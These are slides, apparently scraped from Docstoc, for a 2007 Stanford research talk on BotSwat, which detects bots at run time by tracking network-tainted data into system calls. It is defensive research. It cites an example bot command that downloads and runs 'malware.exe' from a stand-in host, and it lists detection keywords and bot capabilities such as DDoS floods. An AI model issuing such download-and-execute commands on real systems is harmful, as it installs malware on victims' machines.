Docstoc

BotSwat host based run time bot detection

Document Sample
BotSwat host based run time bot detection Powered By Docstoc
					Characterizing Bots’ Remote
Control Behavior
                           DIMVA 2007 (SIG SIDAR Conference on
  Detection of Intrusions and Malware & Vulnerability Assessment)



    Liz Stinson (stinson@cs.stanford)
 John Mitchell (mitchell@cs.stanford)
                                Stanford University

                               Modified by Kyungdong Kim
The problem
 Can we distinguish the execution of
  malicious bots from that of innocuous
  processes?
   Dynamic, behavior-based approach
 Non-problems (for now):
   How did the bot get there?
   What do we do once we detect it?
   Building a bullet-proof detection system
Outline
   Background info on bots
   Characterizing remote control
   Our method and implementation
   Experimental results
 Botnet: programmable platform
capability                ago DSNX evil G-SyS   sd   Spy
create port redirect      √    √          √     √    √
other proxy               √
web download              √    √          √     √    √
DNS resolution            √               √     √
UDP/ping floods           √         √     √     √
other DDoS floods         √               √          √
scan/spread               √    √          √     √    √
spam                      √
visit URL (click fraud)   √               √     √

  Capabilities are exercised via commands.
 Existing host-based bot detection
 Signature-based (most AV products)
 Rule-based
   Monitor outbound network connection
    attempts (e.g. ZoneAlarm, BINDER)
   Block certain ports (25, 6667, ...)
 Hybrid: content-based filtering
   Match network packet contents to known
    command strings (keywords)
   E.g. Gaobot ddos cmds: .ddos.httpflood
 Network-based botnet detection
   Use botnets’ ongoing C&C behavior as
    basis of detection
   {port, proto, content-based} filtering
                Challenges:
   Set up protocol, botnet topology, timing;
change C&Choneypot; capture bots; obtain
           encrypt bot C&C infiltrate
    bot net/C&C dialogue; traffic;
    use other than worm-like spreading…
   Model bot-infection sequence
   Botnet traffic: anomalous rate of
    dynamic-DNS lookups
Our thesis
 We can distinguish the behavior of
  bots (as they execute on their hosts)
  from that of innocuous processes via
  detecting “remote control”


 How to detect remote control?
Outline
   Background info on bots
   Characterizing remote control
   Our method and implementation
   Experimental results
agobot               http.execute
                      www.badguy.com/malware.exe
                      C:\WINDOWS\bad.exe


connect( … www.badguy.com, … )

send( …, “… GET /malware.exe …”, … )

  fcreate(…, “C:\WINDOWS\bad.exe”, …)




               NIC

 Windows XP
What does remote control look like?


 http.execute <URL> <local_path>

 Invoke system calls: connect, network
  send and recv, create file, write file, …

 On arguments received over the
  network: IP to connect to, object to
  request, file name, …
Our theses
 We can distinguish the behavior of
  bots from that of innocuous processes
  via detecting “remote control”

 We can approximate “remote control”
  as “using data received over the
  network in a system call argument”
Outline
   Background info on bots
   Characterizing remote control
   Our method and implementation
   Experimental results
Identifying remote control

 Data recv’d over net is tainted

 Propagate taint


 Check for tainted args to syscalls
S
O
U
R
        Untainted data
C
E
S



       ?      ?
                    BotSwat              ?          ?

S
I
N
K             CreateProcessA(…)   NtCreateFile(…)
    bind(…)
                                                        ...
S
 But wait…
 Early testing of benign programs: they
  may use tainted data in system call arg –
  in response to user input

   E.g. user clicks on hypertext link (next slide)
               GET /
               Hostname: www.digg.com        1


               <HTML>… <A HREF=“www.foo.com/openmoko...”>
                 OpenMoko - the Anti-iPhone</A>…</HTML>


                  2




  3
connect www.foo.com


GET /openmoko
Hostname: www.foo.com
                          4
 But wait…
 Early testing of benign programs: they
  may use tainted data in system call arg –
  in response to user input
   E.g. user clicks on hypertext link (next slide)


                 Solution:
capture local user input (KB or mouse);
     sanitize subsequent uses of it
S
O
U
R
C
E
S




       ?      ?
                    BotSwat              ?          ?

S
I
N
K             CreateProcessA(…)   NtCreateFile(…)
    bind(…)
                                                        ...
S
 BotSwat architecture: overview
 Interposition mechanism (detours)
   Interposes on API calls
 Tainting module [visibility?]
   Instantiates and propagates taint
 User-input module [how to capture?]
   Tracks local user input as received via KB or mouse
    (“clean” data); propagates cleanliness
 Behavior chkg [which syscalls? conds?]
   Monitors invocations of selected system calls
   Queries tainting and user-input modules
   Determines whether to flag invocation
~70k lines C++ ~2200 intercepted fxns
 Library-call level tainting
 Intercept calls made by process via a DLL
  to memory-copying functions
   If C library functions statically linked in (STAT),
    we won’t see run-time calls to these functions
 Handling visibility limitations
   Taint a mem region on basis of its contents
   Cache network receive buffers
 Taint propagation modes:
   Cause-and-Effect (C&E)–addr&content
   Correlative (CORR)–addr|content|substring
  User input tracking
 Goal: Identify actions initiated by local app user

 Challenge: data value associated with mouse
  input heavily application-defined; not exposed
  via API call or similar

 Solution: consider all data values referred to
  by app while it is handling mouse input event to
  be clean (an over-approximation)
                    System creates message M


                                   Target Window: W
                                   Input Type: LMB click
                                   Location: <x,y>
MainWndProc(…, UINT uMsg,…){

  switch (uMsg) {
     case WM_LBUTTONDOWN:
                                   System posts M to
       ...
     ... } ...                       thread’s queue


  App executes code                                    M1
   to handle event          App reads M from queue
                                                       M2

DispatchMessage(...)                                   M3
                               GetMessage(...)
Behaviors and gates
tainted open file      NtOpenFile    MoveFile{Ex}{A,W}
                                     Win32DeleteFile
tainted create file                  MoveFileWithProgress{Ex}{A,W}
                      NtCreateFile   DeleteFile{A,W}
tainted prog exec
                                     ReplaceFile{A,W}
...
bind tainted IP                      CreateFile{A,W}, OpenFile,
                                     CopyFile{Ex}{A,W}, fopen,
bind tainted port
                                     _open, _lopen, _lcreat, ...
...
tainted send           NtDeviceIoControlFile
derived send
sendto tainted IP            …                 bind, send, sendto,
                                               WSASend, WSASendTo,
sendto tainted port                            SSL_write, …


       Selection of behaviors/gates/sinks:
           informed by bot capabilities
Outline
   Background info on bots
   Characterizing remote control
   Our method and implementation
   Experimental results
Tested BotSwat against…
 Bots: ago, DSNX, evil, G-SyS, sd, Spy
   What’s a bot variant?
      Apply transformations (compr, encr) to bot binary
      Minor source edits (C&C params, config data, …)
   With C lib fxns dynam’ly and stat’ly linked in
   Variants from ago, sd, & Spy families:
     98.2% of all bots seen in wild (’05)
 Eight benign programs: web browser;
  clients: email, ftp, ssh, chat, AV signature
  updater, IRC; IRC server
 Results – overview
 Detected execution of most candidate cmds
 Detected vast majority of bots’ remote
  control behavior (even when couldn’t see
  bots’ calls to memory-copying functions)
   # behaviors exhibited:          207
   # behavs detected (DYN, C&E):   196
   # behavs detected (STAT, CORR): 148
 Tested 8 benign progs; not many FPs
 Performance overhead : 2.81%(C&E),
  3.87%(CORR)
   Command detection

                               ago   DSNX   evil   G-SyS   sd   Spy


# commands                     88     28     5      56     50   36


# candidate commands           36     14     5      26     20   15


# cmds detected (DYN, C&E)     33     14    N/A     26     20   15


# cmds detected (STAT, CORR)   31     10     5      12     12   15
Undetected candidate commands
 DYN, C&E (3)
   Agobot scanning commands (2)
     Takes IP prefix range as argument
     Scans random IPs w/in that range
   Agobot harvest registry command (1)
     Takes registry key name, returns value
 STAT, CORR (28)
   Many cmds which use sprintf to format
    arg buffers ... which are then passed to
    system calls (24)
       Total # behaviors detected
        B1 B2     B3   B4   B5   B6 B7 B8 B9       10   11   12   13   14   15   16   17   18

ago     5    6    7    2    1    5   14   2   14   1    7    3    1    1    1    1    0    0
DSNX    4    4    2    0    0    1   6    4   8    0    0    0    0    0    0    0    0    0
evil    0    0    5    0    0    0   0    0   0    0    0    0    0    0    0    0    0    0

GSys    1    1    8    0    0    1   8    4   10   1    1    1    0    0    0    0    3    1

sd      1    1    2    0    0    1   8    4   10   1    1    1    0    0    0    0    3    1
Spy     4    5    1    1    0    2   4    3   1    0    1    1    0    0    0    0    0    0




TOT     15   17   25   3    1    10 40 17 43       3    10   6    1    1    1    1    6    2


       Use behavioral differences across families
               for variant classification.
  Benign program testing
 Tested eight progs over typical activities
 Very few false positives
   Auto download linked-in images (browser, email) (4) –
    <IMG SRC=“…”> tags
   Handling attachments – tainted create file (email) (1)
   Direct Client Protocol file receipt (IRC client) – user-
    input tracking limit (2)
      But: Recommended config: disable this
       functionality
   Server echo data heard on one socket out others (1)
 Interesting: Of the 8 FPs, 6 would not occur
  under different app configs
 Our mechanism – review

 Single behavioral signature detects most
  of the bad stuff done by most bots
 Immune to differences that distinguish
  variants (and even families)
 Doesn’t rely on particular C&C protocol or
  botnet structure
 Low false positives
Questions?

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:12
posted:1/10/2012
language:English
pages:32